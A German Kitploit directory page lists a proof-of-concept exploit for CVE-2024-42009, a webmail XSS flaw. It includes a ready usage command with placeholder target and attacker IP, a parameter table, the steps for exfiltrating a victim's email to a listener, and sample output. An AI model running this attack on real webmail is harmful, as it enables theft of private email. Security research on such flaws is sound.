Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-42009 — Dieses Proof of Concept (PoC) demonstriert einen Exploit für CVE-2024-42009, der eine Cross-Site-Scripting-(XSS)-Schwachstelle ausnutzt, um E-Mails aus einer Ziel-Webmail-Anwendung zu extrahieren. Der Angriff injiziert eine schädliche Payload, die E-Mail-Inhalte an einen vom Angreifer kontrollierten Listener exfiltriert. | Kitploit
Tools/GitHubGitHub/bhanunamikaze/cve-2024-42009
Phishing-ToolsAufklärungPayload-GenerierungExploitationWebanwendungs-ExploitationDatenexfiltrationInformationsbeschaffungLernen & Bildung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

GitHub
bhanunamikaze/cve-2024-42009

CVE-2024-42009

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Dieses Proof of Concept (PoC) demonstriert einen Exploit für CVE-2024-42009, der eine Cross-Site-Scripting-(XSS)-Schwachstelle ausnutzt, um E-Mails aus einer Ziel-Webmail-Anwendung zu extrahieren. Der Angriff injiziert eine schädliche Payload, die E-Mail-Inhalte an einen vom Angreifer kontrollierten Listener exfiltriert.

Teilen

CVE-2024-42009 PoC: E-Mail-Capture-Listener & XSS-Exploit

Übersicht

Dieser Proof of Concept (PoC) demonstriert einen Exploit für CVE-2024-42009, der eine Cross-Site-Scripting (XSS)-Schwachstelle ausnutzt, um E-Mails aus einer Ziel-Webmail-Anwendung zu extrahieren. Der Angriff injiziert eine schädliche Nutzlast, die E-Mail-Inhalte an einen vom Angreifer kontrollierten Listener exfiltriert.

Funktionen

  • Nutzt eine XSS-Schwachstelle aus, um E-Mail-Inhalte zu erfassen.
  • Verwendet einen HTTP-Listener, um exfiltrierte E-Mails zu empfangen und zu dekodieren.
  • Automatisiert die Payload-Injektion und Exfiltration.

Voraussetzungen

  • Python 3.x
  • Erforderliche Abhängigkeiten (Installation via pip):
    root@kitploit:~
    pip install requests beautifulsoup4
    

Verwendung

Führen Sie das Skript mit den erforderlichen Argumenten aus:

root@kitploit:~
python exploit.py -fu [email protected] -tu [email protected] -u http://target.com/contact -ip YOUR_IP -p 1337

Parameter

Angriffsablauf

  1. Listener starten: Das Skript startet einen HTTP-Server, um extrahierte E-Mails zu erfassen.
  2. Schädliche Payload injizieren: Die XSS-Payload wird über eine präparierte E-Mail gesendet.
  3. Ausführung auslösen: Wenn das Opfer die E-Mail öffnet, wird die Payload ausgeführt und sendet den E-Mail-Inhalt an den Server des Angreifers.
  4. Erfassen & Dekodieren: Der extrahierte E-Mail-Inhalt wird dekodiert und angezeigt.

Beispielausgabe

root@kitploit:~
[*] CVE-2024-42009 PoC: Höre auf 192.168.1.100:1337...
[*] Sende Payload für UID 1...
[+] Payload für UID 1 gesendet (Status: 200)

[+] Erfasster E-Mail-Inhalt:
Hallo, dies ist eine Test-E-Mail!

Haftungsausschluss

Ich beanspruche keine Anerkennung/Eigentumsrechte/Offenlegung der Schwachstelle und aller entsprechenden Exploits, die in diesem GitHub-Repo gehostet werden – Alle Credits gehen an den Forscher, der sie entdeckt hat; ich habe lediglich einen POC erstellt, um die Schwachstelle basierend auf Daten aus dem Internet zu replizieren. Dieser PoC dient ausschließlich Bildungs- und Forschungszwecken. Nicht autorisierte Tests gegen Systeme ohne Zustimmung sind illegal. Verwenden Sie ihn verantwortungsvoll!

Tool herunterladen
ArgumentBeschreibung
-fu, --from-userDie E-Mail-Adresse des Absenders
-tu, --to-userDie E-Mail-Adresse des Empfängers
-u, --target-urlDie Ziel-Webmail-URL
-ip, --server-ipDie IP-Adresse des Angreifer-Listeners
-p, --server-portDer Port für den Listener (Standard: 1337)